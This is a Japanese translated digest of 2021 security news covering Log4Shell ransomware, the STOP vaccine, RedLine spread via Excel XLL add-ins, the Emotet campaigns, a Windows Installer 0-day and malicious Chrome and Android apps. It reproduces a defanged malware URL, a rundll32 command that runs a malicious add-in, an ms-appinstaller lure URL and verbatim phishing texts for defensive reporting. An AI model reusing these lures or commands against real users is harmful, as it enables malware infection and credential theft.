    クリスマスの期間は警戒するようにアドバイスされている

     オンラインショッピングに耽っている消費者は、Magecartのアクターが積極的に活動するであろうクリスマスの間、特に注意するようアドバイスされている。
     スキマーの検出は、Eコマースサイト所有者の責任であり、訪問者の責任ではない。訪問者は代わりに次のことを行うことができる。
       最新(【訳者補注】もしくは、アップデートして)のインターネット セキュリティ ソリューションを使用する
      カードの代わりに電子的方法で支払う
      一回限りのバーチャル カードを使用する
       可能であれば代金引換で支払う
     今年、上記7つのWebサイトからクレジットカードを使用して何かを購入した場合は、支払いの詳細が危険にさらされていると考え、銀行に電話し、カードの交換を依頼しなさい。


    現在、新しい身代金要求型マルウェアがLog4Shell攻撃で配備されている
    BleepingComputer : News>Security(2021/12/14)
     身代金要求型マルウェアをダウンロードしインストールするために使用されているLog4j Log4Shell脆弱性の最初に公開されたケースは研究者たちによって発見された。
     先週の金曜日、公開された脆弱性攻撃は、Apache Log4j Javaベース ログイン プラットフォームで'Log4Shell'と名付けられた緊急の0-Day脆弱性に関するものであった。Log4jは、開発者のJavaアプリケーションにエラーやイベントログを追加することを可能にする開発フレームワークである。
     この脆弱性は、Log4jによって読み込まれた時、このプラットフォームが含まれているURLに接続しコードを実行するための特別なJNDI(【訳注】Java Naming and Directory Interfaceの頭文字)文字列を脅威のアクターが作成することを可能にしている。これは攻撃者が、簡単に脆弱性のあるデバイス検出したり、リモートサイトやBase64でエンコードされた文字列を介して供給されるコードを実行することを可能にするものである。
     この脆弱性は、Log4j 2.15.0で修正されLog4j 2.16.0で更に強化されたが、様々なマルウェア(coin miners, botnets, Cobalt Strike beaconsを含む)インストールするために脅威のアクターによって広範な脆弱性攻撃に使用されている。

    身代金要求型マルウェアをインストールする最初のLog4j脆弱性攻撃

     昨日、Bitdefenderは、Log4Shell脆弱性攻撃を介して直接身代金要求型マルウェアファミリーをインストールする最初のケースを発見したとレポートした。
     この脆弱性攻撃は、Log4jアプリケーションによってロードされ実行されるhxxp://3.145.115[.]94/Main.classからJavaクラスをダウンロードする。
     一旦ロードされると、'Khonsari'と名付けられた新しい身代金要求型マルウェア[VirusTotal]をインストールするために同じサーバから .NETバイナリをダウンロードする。
     この同じ名前はまた、以下に示すように暗号化されたファイルの拡張子や脅迫文としても使用されている。


    Khonsariの脅迫文(画像をクリックすると拡大表示されます)

     その後の攻撃に於いて、BitDefenderは、この脅威のアクターがOrcus Remote Access Trojanを拡散させるために同じサーバを使用していたことに気づいた。

    ワイパーの可能性が高い

     身代金要求型マルウェアのエキスパートMichael GillespieがBleepingComputerに告げたところによると、Khonsariは確固たる暗号化を使用しており、安全である。これはファイルを無料で復号することが不可能であることを意味している。
     しかしながら、この脅迫文には一つ奇妙な点がある。身代金を支払うために脅威のアクターに接触する情報が含まれていないようである。
     EmsisoftのアナリストBrett CallowがBleepingComputerに指摘したところによると、この身代金要求型マルウェアは、脅威のアクターではなくLouisianaアンティークショップのオーナーへの接触情報に因んで名付けられているとしている。
     それ故、この人が、この身代金要求型マルウェア攻撃の実際の犠牲者なのか、囮としてリストされているのかは不明である。
     理由の如何を問わず、これは脅威のアクターへの正当な接触情報を含んでいないので、我々は、これは身代金要求型マルウェアではなくワイパーであると確信している。
     これは、身代金要求型マルウェア(ワイパー?)を直接インストールするLog4j脆弱性攻撃の最初に知られたインスタンスである可能性がある。Microsoftは既に、この脆弱性攻撃がCobalt Strike beaconを配備するために使用されていることを確認している。
     従って、より高度な身代金要求型マルウェア オペレーションが彼らの攻撃の一部としてこの脆弱性攻撃に既に使用されている可能性がある。


    STOP身代金要求型マルウェアのワクチンが暗号化をブロックするためにリリースされた
    BleepingComputer : News>Security(2021/12/07)
     ドイツのセキュリティソフトウェア企業G DATAは、STOP身代金要求型マルウェアが感染後犠牲者のファイルを暗号化することをブロックするワクチンをリリースした。
     「このツールは感染自体を防ぐものではない。STOP身代金要求型マルウェアは、依然として脅迫文を配置し、システムの設定を変更するかもしれない」と、続けて「しかし、STOP身代金要求型マルウェアは、そのシステムがこのワクチンを持っていたなら、最早ファイルを暗号化することはない。この脅迫文は、個人IDの代わって、ファイルはワクチンによって保護されたとする文字列を含んでいる」と、G DATAのマルウェア解析者Karsten HahnとJohn Parolは説明している。
     あなたは、ここからSTOP身代金要求型マルウェアのワクチンをダウンロード(コンパイルされた .EXE もしくは Pythonスクリプトとして)することができる。
     このワクチンは、あなたのセキュリティソフトにシステムが感染されたと思わせる可能性がある。これは、そのデバイスが既にセキュリティ侵害されていると、STOP身代金要求型マルウェアを欺くために、通常感染させられたシステムにこのマルウェアが配備するファイルを追加することによって動作する。
     148の変種によって暗号化されていたファイルを無料で復号するためにEmsisoftとMichael Gillespieによって2019年10月にStop身代金要求型マルウェア用の復号プログラムもリリースされたが、新しい変種に対しては最早機能しない。他方、この身代金要求型マルウェア株に対する防御をのぞむのであれば、G DATAのワクチンは確実な方法である。

    STOP Ransomewareワクチン(画像をクリックすると拡大表示されます)

     しかしながら、脅威のアクターはワクチンがリリースされた後、一般的にはワクチンをバイパスするため、このワクチンは、この身代金要求型マルウェアの将来のバージョンでは機能しなくなる可能性がある。
     したがって、ワクチンを適用した後は、重要なファイルがバックアップされていることを確認する必要がある!

    STOP Ransomware ― 誰も語っていない最もアクティブなランサムウェア

     他の身代金要求型マルウェア株がメディアの注目を浴びているが、STOP身代金要求型マルウェアは、近年ID Ransomeware(【訳注】身代金要求文、及び/又は、暗号化されたファイルのサンプルをアップロードすることでランサムウェアを特定するためのサイト、このサイトは言語を選択することで日本語化できます)への登録とBleepingComputerのフォーラムでのサポートリクエストの最も重要な一部である。
     積極的に活動している身代金要求型マルウェアの中で、一日あたりのID Ransomewareへの数千の送信のうちの60~70%がSTOP身代金要求型マルウェアに関するものである。

    STOP身代金要求型マルウェアの活動(画像をクリックすると拡大表示されます)

     これは、この身代金要求型マルウェアが、怪しげなサイト、悪意あるソフトウェアクラックもしくは、アドウェアに同梱されたフリープログラムを装うものを押し付けることを通じて、主にホーム ユーザをターゲットにしているためである。
     後者は通常、ユーザーのコンピューターに様々な望みもしないソフトウェアをインストールする。多くの場合、インストールされるプログラムの1つは、STO身代金要求型マルウェア等のマルウェアである。
     STOP身代金要求型マルウェアの拡散に使用されているものとして報告されているクラックは、KMSPico, Cubase, Photoshop, アンチウィルスソフトが含まれている。
     この展開手法を使用することの他に、STOPは、一般的な身代金要求型マルウェア同様にファイルを暗号化し、拡張子を追加し、500USDから1000USDの範囲で身代金を要求する文書をドロップする。
     そこで、これを成功させるために、大量の変種を絶えずリリースし検出を回避している。


    悪意あるExcel XLLアドインが、パスワード窃盗マルウェアRedLineを押し付けている
    BleepingComputer : News>Security(2021/12/05)
     サイバー犯罪者は、Webサイトのコンタクト フォームやディスカッション フォーラムをスパミングし、パスワードと情報を盗むマルウェアであるRedLineをダウンロードさせインストールさせるためにExcell XLLファイルを配布している。
     RedLineは、クッキー、ユーザ名とパスワード、Webブラウザ中に保存されているクレジットカード並びに感染したデバイスからFTP認証とファイルを盗む情報窃盗トロイの木馬である。
     データの窃取に加えて、RedLineは、コマンドを実行し更なるマルウェアをダウンロードし稼働し、アクティブWindowsスクリーンのスクリーンショットを作成することができる。
     この全てのデータは集められ、犯罪者マーケットで販売するためにこの攻撃者に送り返されたり、他の悪意ある行為や詐欺行為に使用される。

    コンタクト フォームやディスカッション フォーラムをスパミングする

     ここ2週間に渡り、BleepingComputerのコンタクト フォームは様々なフィッシングの疑似餌で多大な回数スパムされた(インチキの広告リクエスト、クリスマスプレゼントの案内、Webサイト プロモーションを含む)。
     この疑似餌を研究したところ、BleepingComputerは、パブリックフォーラムや記事コメントシステムを使用している多くのWebサイトをターゲットにした広範なキャンペーンの存在を発見した。
     BleepingComputerが発見したフィッシングの疑似餌の中には、脅威のアクターがインチキのWebサイトを作成し、マルウェアをインストールするために使用される悪意あるExcel XLLファイルをホストしていた。
     例えば、或るキャンペーンは、以下のスパムメッセージと正当なPlutio(【訳注】フリーランサーや中小企業向けに設計されたオールインワンのビジネス管理プラットフォーム(Capterraより))のサイトを真似たインチキのWebサイトを使用していた。

     Everything you need to run your business. Manage projects, create dazzling proposals and get paid faster. Black Friday! All plans are FREE, no credit card required.

    悪意あるXLLファイルを押し付けるために開発されたインチキのPlutio(画像をクリックすると拡大表示されます)

     他のスパムメッセージは、支払い報告、広告の要求、以下に示したように、Google Drive上にホストされた悪意あるXLLファイルへのリンクが付属するギフトガイドであることを装っている。

    Google Driveにホストされた悪意あるXLLファイル(画像をクリックすると拡大表示されます)

     特段の興味を惹いたのは、サイトの所有者をターゲットにした疑似餌である。これはサイトの所有者に広告の掲載を要請し、オファーの条件を確認するよう依頼している。これはマルウェアをインストールする悪意ある'terms.xll'ファイルを導入することになる。

     Sell us advertising space on your site from $ 500
    You can read our terms on the link below
    https://drive.google[.]com/file/d/xxx/view?usp=sharing

     今週BleepingComputerが発見した別の疑似餌は、

     Thanks for using our app. Your payment has been approved. You can see your payment report on the link below https://xxx[.]link/report.xll

     Google just revealed the 100 hottest gifts of 2021

    I won $10.000. Want it too? Read and accept the terms
    https://drive.google[.]com/file/d/xxx/view?usp=sharing

    Excel XLLファイルの悪用

     これらのスパムキャンペーンは、犠牲者のWindowsデバイスにRedLineマルウェアをダウンロードしインストールする悪意あるExcel XLLファイルを押し付けるように設計されている。
     XLLファイルは、開発者がデータの読み込み・書き込み、他のソースからのデータのインポート、様々なタスクを実行するためのカスタム機能を作成することでExcelの機能の拡張を可能にするアドインである。
     XLLファイルは単純なDLLファイルであり、そのアドインが起動された時に、Microsoft Excelによって実行される'xlAutoOpen'関数を含んでいる。

    Excelで悪意あるアドインを開いている(画像をクリックすると拡大表示されます)

     BleepingComputerとTheAnalyst(一緒にこの攻撃に関して論議しているセキュリティ研究者)とで実行したテストでは、このXLLファイルは正しくロードされなかったが、Microsoft Excelの他のバージョンでは動作するかもしれない。
     regsvr32.exeコマンドもしくは、'rundll32 name.xll, xlAutoOpen'コマンドを手動で実行すると、 %UserProfile%フォルダにwget.exeプログラムを抽出する。このファイルは、リモートサイトからRedLineバイナリをダウンロードするために使用される。


    wgetを使用してRedLineマルウェアをダウンロードしているXLL DLL(画像をクリックすると拡大表示されます)

     この悪意あるバイナリは、%UserProfile%\JavaBridge32.exe [VirusTotal] として保存され、実行される。
     レジストリのautorunエントリにも、犠牲者がWindowsにログインする度にRedLine情報窃盗マルウェアが自動的に起動するように作成される。

    Windowsレジストリに追加されたRedLineのautorun(画像をクリックすると拡大表示されます)

     このマルウェアが実行されると、盗む価値のあるデータ(Chrome, Edge, Firefox, Brave, Operaブラウザに格納されている認証とクレジットカードを含む)が検索される。
     あなたがこのキャンペーンの犠牲者になったのであれば、あなたが格納しているパスワードはセキュリティ侵害されていると思わなければならない、直ちにそれらを変更しなさい。更に、あなたがブラウザ中にクレジットカードを格納していたのであれば、あなたのクレジット会社にコンタクトし、この重大事案を注意喚起すべきである。
     XLLファイルは実行可能ファイルなので、脅威のアクターは、デバイス上で様々な悪意ある挙動を実行するためにXLLファイルを使用することができる。それ故、信頼されるソースからのものを除いて、XLLファイルを決して開いてはならない。
     これらのファイルは一般的に添付ファイルとして送信されることはないが、代わりに、他のプログラムやあなたのWindows管理者を介してインストールされる。
     それ故、この種のファイルを配布するeMailやメッセージを受け取った場合には、単純にそのメッセージを削除し、スパムとして報告しなさい。


    Emotetは現在、インチキのAdobe Windows App Installerパッケージを介して拡散している
    BleepingComputer : News>Security(2021/12/01)
     Emotetマルウェアは現在、Adobe PDFを装う悪意あるWindows App Installer(アプリ インストーラ)を介して拡散している。
     Emotetは、フィッシングeMailや悪意ある添付ファイルを介して拡散している悪名高きマルウェア感染である。一旦インストールされると、このマルウェアは他のスパム キャンペーンのために犠牲者のeMailを盗み、一般的に身代金要求型攻撃を導くTrickBotやQbotのようなマルウェアを配備する。
     Emotetの背後にいる脅威のアクターは、Windows 10やWindows 11の組み込み機能であるApp Installerを使用して悪意あるパッケージをインストールすることでシステムに感染している。
     研究者達は今までに、Microsoft Azureでホストされている悪意のあるパッケージをインストールするBazarLoaderマルウェアを配布するために、これと同じ方法が使用されていたことを確認している。

    Windows App Installerの悪用

     EmotetトラッキンググループのCryptolaemusによって提供されたURLとeMailを使用して、BleepingComputerは、以下に示すように、この新しいeMailキャンペーンの攻撃フローをデモした。
     この新しいEmotetキャンペーンは、既存の通信に対する返信のように見せかける盗まれたリプライチェーンeMailで始まる。
     これらの返信は、単純に "Please see attached"(添付ファイルを確認してください)と受信者に告げている。そして、このeMail通信に関連付けられて述べられているPDFへのリンクを含んでいる。

    EmotetのフィッシングeMail(画像をクリックすると拡大表示されます)

     このリンクがクリックされると、ユーザはインチキのGoogle Driveページに連れて行かれ、PDFドキュメントを表示するためのボタンをクリックするように促される。

    PDFをプレビューするように促しているフィッシングページ(画像をクリックすると拡大表示されます)

     この'Preview PDF'ボタンは、ms-appinstaller URLである。これは、*.web.core.windows.netのURLを使用しているMicrosoft Azureにホストされているappinstallerファイルを開こうとする。
     例えば、Adobeのリンクは、この例の URL: ms-appinstaller:?source=https://xxx.z13.web.core.windows.net/abcdefghi.appinstaller でappinstallerパッケージを開くだろう。
     appinstallerファイルは、単純なXMLファイルであり、署名した発行者に関する情報とインストールされるバンドルされているアプリケーションへのURLを含んでいる。

    Emotetのappinstaller XMLファイル(画像をクリックすると拡大表示されます)

     .appinstallerファイルを開こうとすると、WindowsブラウザはWindows App Installerプログラムを開いて進行することを希望するか否かを確認してくる。
     同意すると、App Installerウィンドウは'Adobe PDF Component'をインストールすることを促してくる。

    インチキのAdobe PDFコンポーネントのインストールを促してくるApp Installer(画像をクリックすると拡大表示されます)

     この悪意あるパッケージは、正当なAdobe PDFアイコン、'Trusted App'としてマークされている有効な証明書、インチキの発行者情報が付いているので正当なAdobeアプリケーションのように見える。このWindowsからのこの種類の確認は、多くのユーザがそのアプリケーションを信頼しインストールするのに十分過ぎるものである。
     ユーザが'Install'ボタンをクリックすると、App Installerがダウンロードされ、Microsoft Azureにホストされている悪意あるappxbundleがインストールされる。このappxbundleは、%Temp%フォルダにDLLをインストールし、以下に示す rundll32.exe で、それを実行する。

    Emotet感染のインストール(画像をクリックすると拡大表示されます)

     このプロセスは、ランダムに名前付けされたファイルとしてこのDLLをコピーし、以下に示すように、%LocalAppData%の下のフォルダにコピーされる。

    ランダムなファイル名で保存されたEmotet(画像をクリックすると拡大表示されます)

     最後に、autrunは、ユーザがWindowsにログインした時に自動的にこのDLLが起動するようにHKCU\Software\Microsoft\Windows\CurrentVersion\Runを作成する。

    Windowsが起動した時にEmotetが起動するためのRegistry autrun(画像をクリックすると拡大表示されます)

     Emotetは、法執行機関がシャットダウンし、ボットネットのインフラを奪うまで、最も激しく拡散したマルウェアであった。10ヶ月後、Emotetは、TrickBotトロイの木馬の助けを得て再構築を開始し復活した。
     1日後、Emotetスパムキャンペーンは、様々な誘惑とマルウェアをインストールする悪意あるドキュメントでユーザのメールボックスを攻撃するeMailで始まった。
     これらのキャンペーンにより、Emotetはその存在感を迅速に構築し、TrickBotとQbotをインストールする大規模なフィッシングキャンペーンを再度実行できるようになった。
     Emotetキャンペーンは通常、身代金要求型マルウェア攻撃につながる。 Windows管理者は、マルウェアが配布される方法を常に把握し、Emotetキャンペーンを見つけるように従業員をトレーニングする必要がある。


    脆弱性攻撃が公開されている新しいWindowsの0-Dayは管理者になることを可能にしている
    BleepingComputer : News>Security(2021/11/22)
     セキュリティ研究者は、Windows 10, Windows 11, Windows Serverにおいてローカル特権を管理者特権に昇格させる新しいWindowsの0-Dayを公開した。
     BleepingComputerは、この脆弱性攻撃をテストし、ローレベルの「標準」特権しか持たないアカウントからシステム特権付きのコマンドプロンプトを開くために使用した。
     この脆弱性を使用すると、セキュリティ侵害したデバイスに対して限定的なアクセスしか持たない脅威のアクターが、彼らの特権を簡単に昇格させることができ、ネットワーク中で水平方向に拡散する助けとなる。
     この脆弱性は、サポートされているWindowsの全てのバージョン(Windows 10, Windows 11, Windows Server 2022)に影響を与える。

    研究者はパッチされた脆弱性に対するバイパスをリリース

     2021年11月の定例パッチの一部として、Microsoftは、CVE-2021-41379として追跡される'Windows Installer Elevation of Privilege Vulnerability'(Windows インストーラーの特権の昇格の脆弱性)に関する脆弱性を修正した。
     この脆弱性は、セキュリティ研究者Abdelhamid Naceriによって発見された。彼は、Microsoftの修正を検証した後、このパッチはバイパスでき、より強力な新しい0-Dayの特権昇格の脆弱性を発見した。
     昨日、Naceriは、GitHub上にこの新しい0-Dayに関するproof-of-concept(概念の実証)を公開し、これがサポートされているWindowsの全てのバージョンで動作することを説明している。
     「この別形は、CVE-2021-41379パッチを解析している間に発見された。このバグは正しく修正されておらず、代わりにバイパスを投下している」と「私は、これがオリジナルの脆弱性よりももっと強力であるために、この別形を実際に投下することを選択した」と、彼の記事でNaceriは説明している。
     更に、Naceriは、「標準」ユーザをMSIインストーラの実行から妨げるためにグループポリシーを設定することは可能だが、彼の0-Dayは、このポリシーをバイパスし、ともかく機能すると説明している。
     BleepingComputerは、彼の'InstallerFileTakeOver'をテストした。結果、「標準」特権のテストアカウントからシステム特権を取得するまで僅か数秒であった。以下のビデオがデモンストレーションである。

     このテストは完全にアップデートされたWindows 10 21H1 build 19043.1348で実行された。
     BleepingComputerがNaceriに、この0-Dayを公開した理由を尋ねた時、彼は、MicrosoftのBug Bounty(脆弱性報奨金制度)の報奨金の減額に不満を持っていたためであると告げられた。
     「Microsoft報奨金は、2020年4月以来廃棄されている、Microsoftが、報奨金をダウングレードするような決定をしなかったなら、私はこのようなことをしなかっただろう」と、Naceriは説明している。
     研究者が報奨金の減額に感じている懸念はNaceri一人ではない。

    Microsoftは、この脆弱性が一般公開されたことを認識しているとBleepingComputerに告げている。

     「我々は、公開されたことに関して認識しており、顧客の安全と保護を維持するために必要なことを実行するだろう。説明されている方法を使用している攻撃者は、既にターゲットにした犠牲者のマシンに関するアクセスとコード実行の能力を既に取得しているに違いない」

     しかしながら、Naceriは、サードパーティのパッチ適用企業がバイナリにパッチを適用して、この脆弱性を修正しようとすることは、インストーラを壊す可能性があるため、推奨できないと警告している。
     「この記事を記述している時点で利用可能な最善の回避策は、この脆弱性が複雑であるために、Microsoftによるセキュリティパッチのリリースを待つことである」とNaceriは説明している。
     「バイナリに直接パッチを適用しようとする如何なる企ても、Windowsインストーラを破損させるだろう。そこで、待つことがより適切であり、Microsoftがパッチをどのように再度適用するのかを確認することである」


    新しいEmotetスパム キャンペーンは世界中のメールボックスを攻撃している
    BleepingComputer : News>Security(2021/11/16)

    (画像をクリックすると拡大表示されます)

     Emotetマルウェアは昨日、10ヶ月に及ぶ複数のスパムキャンペーンの活動休止後、世界中のメールボックスに悪意あるドキュメントの配布を開始した。
     Emotetは、悪意ある添付ファイルによるスパムキャンペーンを介して拡散するスパム感染である。ユーザがこの添付ファイルを開くと、悪意あるマクロやJavaScriptが、Emotet DLLをダウンロードし、PowerShellを使用して、それをメモリにロードする。
     一旦ロードされると、このマルウェアは、将来のスパムキャンペーンに使用するためにeMailを探して盗み、一般的に身代金要求型マルウェアを導くTrickBotやQbotのような追加のペイロードを投下する。

    再び開始されたEmotetスパム

     昨夜、サイバーセキュリティ研究者Brad Duncanは、EmotetボットネットがEmotetマルウェアでデバイスに感染するために複数のeMailをスパミングするキャンペーンをどのように始めたかに関するSANS Handler Diaryを公開した。
     Duncanによると、このスパムキャンペーンは、受信者を誘惑し添付された悪意あるWord, Excel, パスワードで保護されたZIPファイルを開かせるためにリプレイチェーンeMailを使用している。
     リプレイチェーン フィッシングeMailは、今までに盗まれたeMailスレッドが、成り済ましの返信で使用され、他のユーザにマルウェアを拡散するものある。
     Duncanによって公開されたサンプルで、我々は「失くした財布」、CyberMondayセール(【訳注】 米国で感謝祭の次の月曜日から始まる大規模なオンラインショッピング上でのセール(Wikipediaより))、キャンセルされた会合、政治献金の推進、歯科保険の終了に関連するリプライチェーンが使用されていることを確認できる。
     これらのeMail添付ファイルは、以下に示すように、悪意あるマクロの付属したExcelやWordドキュメント、あるいは、悪意あるWordドキュメントを含むパスワードで保護されたZIPファイルである。

    Excel添付ファイルのEmotet eMail(画像をクリックすると拡大表示されます)

    Wordドキュメントが添付されたEmotet eMail(【訳注】文末に 失くした財布 の記載)(画像をクリックすると拡大表示されます)

    パスワードで保護されたZIP添付ファイルのEmotet eMail(画像をクリックすると拡大表示されます)

     現在、新しいEmotetスパムキャンペーンで拡散されている二つの異なる悪意あるドキュメントがある。
     一つ目は、このドキュメントはデスクトップもしくはラップトップのみで動作し、そのユーザがコンテンツを適切に閲覧するには「コンテンツの有効化」をクリックする必要があると述べているExcelドキュメント テンプレートである。

    悪意あるMicrosoft Excel添付ファイル(画像をクリックすると拡大表示されます)

     悪意あるWord添付ファイルは、'Red Dawn'テンプレートを使用しており、このドキュメントは"プロテクト"モードなので、正しく閲覧するには「コンテンツの有効化」と「編集を有効にする」を実行しなければならないと述べている。

    Microsoft WordのRed Down添付ファイル(画像をクリックすると拡大表示されます)

    Emotet添付ファイルはどのようにしてデバイスに感染するのか

     Emotet添付ファイルを開くと、このドキュメント テンプレートは、プレビューが可能ではなく、コンテンツを適切に閲覧するには「編集を有効にする」と「コンテンツの有効化」をクリックする必要があると言ってくる。
     しかしながら、これらのボタンをクリックすると、悪意あるマクロが有効になり、PowerShellコマンドが起動し、セキュリティ侵害されたWordPressサイトからEmotetローダーDLLがダウンロードされ C:\ProgramData フォルダに保存される。

    Emotet DLLをダウンロードし実行するPowerShellコマンド(画像をクリックすると拡大表示されます)

     ダウンロードされると、このDLLは、C:\Windows\SysWo64\rundll32.exe を使用して起動する。これは、%LocalAppData%にあるランダムなフォルダにこのDLLをコピーし、次に、そのフォルダからこのDLLを再起動する。

    リネームされたEmotet DLLを含むフォルダ(画像をクリックすると拡大表示されます)

     その後、Emotetは、Windowsが起動した時にこのマルウェアが起動するようにHKCU\Software\Microsoft\Windows\CurrentVersion\Runの下にスタートアップ値を構築する。

    起動時にEmotetをロードするためのRegistryのRunエントリ(画像をクリックすると拡大表示されます)

     そのコマンドとコントロール サーバからコマンドが実行されるのを待っている間、Emotetマルウェアは、バックグラウンドで密かに稼働し続けている。
     これらのコマンドは、eMailを検索して盗んだり、他のコンピュータに拡散したり、あるいは、TrickBotやQbotトロイの木馬のような追加のペイロードをインストールしたりするためのものである。

    Emotetの攻撃フロー(画像をクリックすると拡大表示されます)

     この時点で、BleepingComputerはEmotetによって投下される如何なる追加のペイロードも確認していない。これはDuncanのテストでも確認されている。
     「私は、私の最近のEmotet感染ホストからのスパムボットの挙動を確認しただけである」と「私は、今週Emotetが再構築されるものと考えている」と、DuncanはBleepingComputerに告げている。
     「おそらく、今後数週間幾つかの追加のマルウェア ペイロードを確認することになるだろう」と、この研究者は追加している。

    Emotetに対する防御

     マルウェアとボットネットモニタリング組織であるAbuse.chは、コマンド&コントロールサーバとの相互通信を防ぐために境界ファイアーウォール(perimeter firewall)がブロックできる245のコマンド&コントロールサーバのリストをリリースした。
     C2との相互通信をブロックすることは、セキュリティ侵害されたデバイス上にEmotetが更なるペイロードを投下することを防ぐことでもある。
     国際法執行機関の作戦は、2021年1月にEmotetボットネットを取り潰した。その後10ヶ月間、このマルウェアは活動していなかった。
     しかしながら、日曜日の夜に開始された、アクティブなTrickBot感染が既に感染しているデバイスにEmotetローダーを投下することを開始し、スパム活動のためにボットネットが再構築された。
     Emotetの復活は全てのネットワーク管理者、セキュリティ専門家、Windows管理者が新たな開発を監視しなければならない重要なイベントである。
     過去、Emotetは最も広く拡散しているマルウェアと考えられていた、そして、以前のランキングを取り戻す可能性が高い。


    悪意あるChrome拡張は悪。それなら、ハイジャックされる可能性のある無害なものはどうだろうか? それらの拡張にスポットを当てた新しいツールがある
    The Register : Security(2021/11/11)
     ドイツのCISPA Helmholtz Center for Information Securityのセキュリティ研究者は、悪意あるWebページや他の拡張によってセキュリティ侵害される脆弱性を持つChrome拡張の同定を支援するソフトウェアを開発した。
     2018年に戻る。Googleは彼らのブラウザ拡張プラットフォームをより安全にするために再設計する計画をアナウンスした。彼らの古いルール(Manifest v2として知られる)の下で、Chrome拡張は、簡単に誤用される可能性のある幅広い機能があった。
     そして、多くの悪漢共はこれらの機能を乱用した。例えば2020年2月、Googleは500を超える悪意ある拡張を削除した。これは、支払い詐欺と戦う新しい拡張のために、GoogleがChrome Web Storeを閉じた一ヶ月後であった。2020年の4月と5月には、更に多くの削除があった。この時は、暗号通貨ウォレット認証を盗むように設計された拡張関連であった。2020年6月と12月にもこのような事案があった。そして、この種のことは何年も続いている。
     Chrome Web Storeを綺麗にする努力に加えて、この3年の間に、GoogleはManifest v3を開発してきた。これはより制限した能力を提供する拡張APIセットの改訂版であり、コンテンツのブロックとプライバシーツールの犠牲の上に、セキュリティの危険性とプライバシーの潜在的危険性を向上させたものである。
     Googleは、2021年1月、再調査するためにManifest v3拡張の受け入れを開始した。それであるにも拘わらず、このより先進的な拡張にも脆弱性がないわけではなく、以前のManifest v2拡張は依然として出回っている。
     CISPA Helmholtz boffins Aurore FassのDoliere Francis Some, Michael Backes, Ben Stock(前二人の名前は、ウムラウトを省略しています)は、この状況に対処するための支援としてDoubleXと呼ばれるツールの開発に応じた。
     彼らは、その取り組みを"DoubleX: Statically Detecting Vulnerable Data Flows in Browser Extensions at Scale"と題した論文(PDF)で説明している。これは、the Proceedings of the 2021 ACM SIGSAC Conference on Computer and Communications Security(来週、韓国で開催されるバーチャルイベント)に掲載された。
     悪意のある拡張は、セキュリティとプライバシーの懸念を示す拡張のほんの一部にすぎないと彼らは発言している。
     一方、無害な拡張機能には、ユーザーがインストールした他の拡張や、ユーザーによって訪問された悪意のあるWebページによって、実行すべきでない悪意あるスクリプトを実行したり、データを抽出したり、ダウンロードをトリガーする等に悪用される危険なコードを含んでいる可能性がある。DoubleXが探しているのは、これら無害ではあるが悪用可能な拡張である。
     DoubleXは、データフローの脆弱性にフラグを立てるように設計されたオープンソースの静的アナライザである。言い換えれば、悪意ある拡張を発見するためだけのものでなく、善意や無害のアドオンに存在する悪用可能なデータパスを探すものである。
     これらの欠陥はどのように悪用されるのか? この研究者達の説明によると、eval関数が含まれていることは、攻撃者が脆弱性のある拡張のパーミッションを潜在的に乗っ取ることができることを意味している。また、JavaScriptを挿入するtabs.executeScriptを含む拡張は、そのページ自体に脆弱性を与えることなく全てのWebページに任意のコードを実行する可能性を提供する。

    ・ Googleが以前の拡張の終了日を設定すると、Ad-Blockerの拡大が起こるのではないかということが懸念される。
    ・ 広告ブロックブラウザ拡張は実際には広告を追加すると、Impervaの研究者達は発言している。
    ・ マズいことに、Chromeサミットで、開発者は、何故誰もがGoogleを使用する必要があるのか? と質問している。
    ・ ChromeがWebの機能を侵害し、Googleが誰かに伝えることを忘れた場合はどうなるのか? 待って、それは当に実際に発生していることである。

     DoubleXに多数のChromeアプリケーションを食わせた時、実際に幾つかの問題が発見された。もっとも、Chrome Web Storeの栄光の歴史に期待する人は、おそらく一人未満であろうが。
     「我々は、154,484のChrome拡張を解析した。そのうちの278は外部からのデータ制御可能なデータフローを持っている、もしくは、重要なユーザ情報を抽出するものとしてフラグされた」と「このデータフローの89%が攻撃者によって影響を受けることが確認されている。これはDobuleXの正確性を際立たせている」と、この論文は述べている。
     「更に、我々の脅威モデルのもとで悪用可能(例えば、あらゆるWebサイトで任意のコード実行を導く)な184の拡張(209の脆弱性と共に)を検出した。」
     これら184の拡張(172の拡張は攻撃者の影響を受けやすく、12の拡張は特権を必要としない拡張を介して悪用可能)は、240万から290万ユーザに影響を与える。
     2020年10月から2021年5月まで、この科学者達は責任感から、連絡先情報が分かった場合には、彼らが発見したことを開発者に、それ以外の場合はGoogleに公開した。2021年7月、報告された脆弱性のある48の拡張のうち45が依然としてChrome Web Storeに存在していると主張している。
     「それらの中13は、公開されてからアップデートされたが、修正されたのは5つ(ユーザ数30万以上、ユーザ数3000以上、ユーザ数2000以上、ユーザ数35)に過ぎない」と、この論文は述べている。


    注意: Google Play中のAndroidアプリケーションSmart TV remote'はマルウェアである
    BleepingComputer : News>Security(2021/11/11)
     Google Playストアで利用可能になっている二つのAndroidアプリケーションが今週、マルウェアを含んでいることが発見された。
     これらのアプリケーションは'Smart TV remote'と'Halloween Coloring'と呼ばれれいるアプリケーションであり、前者は少なくとも1000ダウンロードされている。

    'Smart TV remote'アプリケーションは'Joker'マルウェアを同梱している

     今週、KasperskyのAndroidマルウェア アナリストTatyana Shishkovaは、Jokerマルウェアを織り交ぜている二つのGoogle Playアプリケーションの名前を公開した。
     少なくともこれらのアプリケーションの一つである'Smart TV remote'は、10月29日の公開以来これまでに1000回以上インストールされている。
     Shishkovaによると、これらのアプリケーションはJokerマルウェアでトロイの木馬化されている。

     Tatyana ShishkovaのTwitter

     BleepingComputerによって以前報道されたように、Jokerマルウェアの背後にいる脅威のアクターは、無害のアプリケーションと見せかけるために悪意のあるコードを隠し、公式のアプリケーションストアでこれらを公開している。今年始め、500,000を超えるHuawei AndroidデバイスがJokerに感染していることが発見された。
     このマルウェアは、ユーザの同意や認識なしにユーザをプレミアム モバイルサービスに申し込みすることで知られている。

    難読化されたコードはELFを同梱しAPKをダウンロードする

     悪意あるコードをより適切に解析するために、BleepingComputerはAndroidアプリケーションを入手し、これらのAPK(【訳注】Android Application Packageの略称。圧縮ファイルの一種でありその内部にはアプリがデバイスで正しくインストールされ起動するのに必要となるすべてのコンポーネントが保存されている(Malavidaより))を逆コンパイルした。
     また、Shishkovaによっても確認されたこととして、この悪意あるコードはSmart TV remoteアプリケーション中の"resources/assets/kup3x4nowz"ファイルに存在している。Halloween Coloringアプリケーションに関しては、同じファイルが、同じロケーションに存在し"q7y4prmugi"と名付けられている。
